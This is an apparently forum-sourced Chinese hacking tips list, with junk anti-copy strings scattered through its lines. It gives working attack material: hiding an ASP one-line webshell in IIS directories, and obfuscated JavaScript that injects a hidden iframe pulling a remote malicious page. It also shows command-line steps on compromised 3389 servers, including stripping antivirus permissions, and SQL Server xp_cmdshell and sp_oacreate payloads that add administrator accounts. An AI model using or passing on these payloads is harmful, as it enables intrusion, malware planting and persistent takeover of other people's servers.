1、建立非标准目录:mkdir images..\+ Q9 j% H4 H4 h8 h* y& J( B
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp+ U. k0 p4 r$ F6 b
通过web访问ASP木马:http://ip/images../news.asp?action=login
- e( g: Z6 d7 ? A如何删除非标准目录:rmdir images..\ /s
% p+ g" a6 h) S) L: u+ m% |" X2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的: T% {5 i5 T& W3 U3 g; d
mkdir programme.asp
/ [/ v1 H8 H* K& Y3 _新建1.txt文件内容:<!--#include file=”12.jpg”-->
4 |7 m6 A i! p" R$ ?8 \- L M: ~新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件 k3 X: Z8 ?% r
attrib +H +S programme.asp
, o+ h( x( R# j通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
: h' b- \5 W# t, K8 M5 U
$ y# n( ?! w w: A" o54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
/ t9 X" u, j, F! }4 B然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。/ s7 f' c6 s' F4 r4 S; h% s% q2 y
9 J( I1 O3 {' p, Y
55、JS隐蔽挂马
1 F# n+ R2 P7 j, L4 G1.
9 T: E' _2 b3 E9 y- I! Nvar tr4c3="<iframe src=ht";
+ l3 F* ~# f" T1 t0 ]tr4c3 = tr4c3+"tp:/";
2 }- S! Q. V, Z# m Z% L& Z7 \tr4c3 = tr4c3+"/ww";
|9 I% H/ j5 ~, l" e# h3 q0 gtr4c3 = tr4c3+"w.tr4";
/ v0 b' [7 ^( y4 U# m2 i2 S itr4c3 = tr4c3+"c3.com/inc/m";
! J! e/ f3 O" I9 d" r4 Ttr4c3 = tr4c3+"m.htm style="display:none"></i";
; q9 c; E3 U" C n; D5 A, f3 str4c3 =tr4c3+"frame>'";
# W, i/ l4 }9 s$ J+ _ |document.write(tr4c3);* [' p/ ]! M7 w5 f
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。$ s/ Z, a2 ]$ ^0 F/ p' K
+ b; }9 Y* N. ^9 I, a2 x% R2.* u& S) F4 ]9 k2 P! c" ^5 x( u( Q
转换进制,然后用EVAL执行。如# v' g- W! O# G& k$ D9 P: b8 b
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
5 U E! e; _$ E" I# E0 r9 m不过这个有点显眼。 ~3 F' T$ o1 Y2 Y
3." n; @4 ~# J9 e2 X, P/ n: X* h/ ]
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');4 C* f: T z2 w6 Q, h7 g: @/ n
最后一点,别忘了把文件的时间也修改下。$ P8 [7 }* E( H! T) F- o! {
& q* ]9 W( f5 z, f# p, u' [
56.3389终端入侵常用DOS命令
5 q- L/ h# w ?2 e* ttaskkill taskkill /PID 1248 /t
$ J1 U& T- f' O/ r% W. q6 V2 u6 B. L1 ~; ?
tasklist 查进程
: k6 E# W+ N5 M7 z8 j6 w% c8 p
5 I. S- l& l: zcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限; B6 h1 e! y, z' |
iisreset /reboot
8 S2 Q* K ^& T& atsshutdn /reboot /delay:1 重起服务器" y& O+ X5 P/ o/ `8 L& S2 g
4 l; z9 i1 T4 @
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,9 Z4 w8 U; W- W
% H0 u+ H. W% uquery user 查看当前终端用户在线情况 E; E) v$ _6 S4 u2 R
6 E7 A2 ?( v |4 ?4 t
要显示有关所有会话使用的进程的信息,请键入:query process *' ~' [, J$ r1 B$ r0 s* O
s& o$ P) q6 w% Z3 w, p p0 @4 z要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
. J2 r5 g3 g8 D1 G1 }5 u7 y6 P' [. j: M6 J$ G- @
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
% v3 A4 X% S. C) K. r. ?
9 g# ^1 {) V" V要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM021 n" F9 v5 e: I4 ~- Q
( u2 ^( s7 n; \
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
7 J0 z4 l) Z+ x% R" N- o1 v+ |, I: b T; P
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
' u" j* X( k$ D/ G9 G" Q
9 R; T& @, B+ d: X3 ~: ~+ f4 n命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。* I# R! z9 c. ], F! E
`( O o0 H2 m( e
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
) c- X' [8 `( U+ x5 C; o
5 a/ Q7 [- w( q: _; U. a56、在地址栏或按Ctrl+O,输入:
|4 k5 `5 C. @ C' \" wjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;# K- R* m t+ I; w
& ^ e1 C, l! A! q! {源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。! Y6 {7 U# J" c0 g+ s
) v9 n" r7 r- P: W3 K+ n
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,0 d0 {- a, l% U& H6 x( A
用net localgroup administrators是可以看到管理组下,加了$的用户的。
" X+ u$ M" d" Z& ^+ r) k& i3 r& g3 v* C J$ u6 p; V- |8 z( f) }% `
58、 sa弱口令相关命令
8 M6 U" o2 L, M! X2 d1 \4 Z& e5 w" d; w; O
一.更改sa口令方法:
6 G X/ w/ ^1 b8 N用sql综合利用工具连接后,执行命令:0 U( {0 t9 ?% U8 g
exec sp_password NULL,'20001001','sa'/ F' ^& L5 N2 L9 W/ U
(提示:慎用!)
) y! X4 Q9 p' j6 n# I' d9 x3 ]3 ~$ m5 A% o
二.简单修补sa弱口令.
; n9 P _4 X" n) W2 `) V4 ^* c) Y4 A) @5 C$ e
方法1:查询分离器连接后执行:6 t [0 t3 f/ i4 h1 u+ l; f
if exists (select * from
2 L5 f, g f6 _# adbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
' I/ i7 `4 `9 wOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
: g6 i' k$ [" [% Y& _% @1 I3 H& l7 V& O9 v& ^8 Z
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
: H: x: T8 [0 \0 g9 q! g1 w) b: T
2 K- X! }( f! V w! R- UGO1 [4 X8 q+ ^/ Q; I. @1 a' M
$ @- B/ a6 a( r0 a然后按F5键命令执行完毕# Q' u: y( w( {2 p6 F1 d6 R9 B
2 T8 s1 Q! {& j) y" ^, w1 [0 V方法2:查询分离器连接后
, `: W/ k/ L4 C第一步执行:use master
' j m% a1 t/ z! D第二步执行:sp_dropextendedproc 'xp_cmdshell'( G/ w! w! d v% L- H7 n2 ?' {9 o
然后按F5键命令执行完毕
5 t9 S' _+ U- s& j1 i# i
* r$ a! a5 W3 @( u% B7 N/ P' x4 U' z. X& ~0 \. c1 h
三.常见情况恢复执行xp_cmdshell.
; T& t7 E) L1 g! y% X: v* T/ M
* ]# P- w h7 H" W5 G/ r
# b( C. {- Y l1 U5 R0 [1 未能找到存储过程'master..xpcmdshell'.
/ K& q$ _1 q2 i8 {, \2 u: g; Y 恢复方法:查询分离器连接后,4 y2 \" i- d u% M/ o3 I9 [; [
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int0 Q) U1 \0 Z/ T1 K. s: X
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
0 Y h% ?, b% F: W1 ^! W4 i& P然后按F5键命令执行完毕
9 j! z0 m# F9 N1 E1 G
7 e* g: y/ K9 Y6 u2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)) v. j! O& L& E0 L& F! b2 z
恢复方法:查询分离器连接后,, C$ X7 I2 F5 I2 n+ S4 ]) z6 f- D- g
第一步执行:sp_dropextendedproc "xp_cmdshell"0 F3 a" Y) K( |: E1 e; Q
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# } g) o/ C: ?' K然后按F5键命令执行完毕
) r# p- ]6 _1 |7 k
8 _+ k& I' \5 I* o3 K# v6 Y5 f3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)$ s3 Z! k! A5 n$ _+ x
恢复方法:查询分离器连接后,
1 c( _2 h O! V) [; w( B第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
, r1 F/ i W& ^! T) R) w5 X$ }第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
0 R$ I& c* L4 l; }/ _" _2 q然后按F5键命令执行完毕+ \1 u* L0 K% |( d( k1 i& u' q. L
. m+ j6 t7 w; v3 }- b四.终极方法.1 h; G% @% p* v) h3 t+ \
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
4 c5 V' Z. N0 t5 r$ \查询分离器连接后,
6 R. F( ~3 c. v- H& a; g2000servser系统: P; ^# L$ y' u# C [& y3 V; Q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'$ H9 k0 g( j' n
* s8 ?% c! R1 m, y! f
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
' y% m5 ]1 C9 E8 K0 U! C6 Q& [5 I0 u `! d8 C" u4 _8 x j' {# x
xp或2003server系统:
+ {; L/ d, I/ s2 {% k: z8 C
0 e- e, ^$ D6 Ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
7 T8 l R: Q( ?' l7 i8 @0 b* B" z" x; o% ]$ ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add': |8 d/ i; h, e
|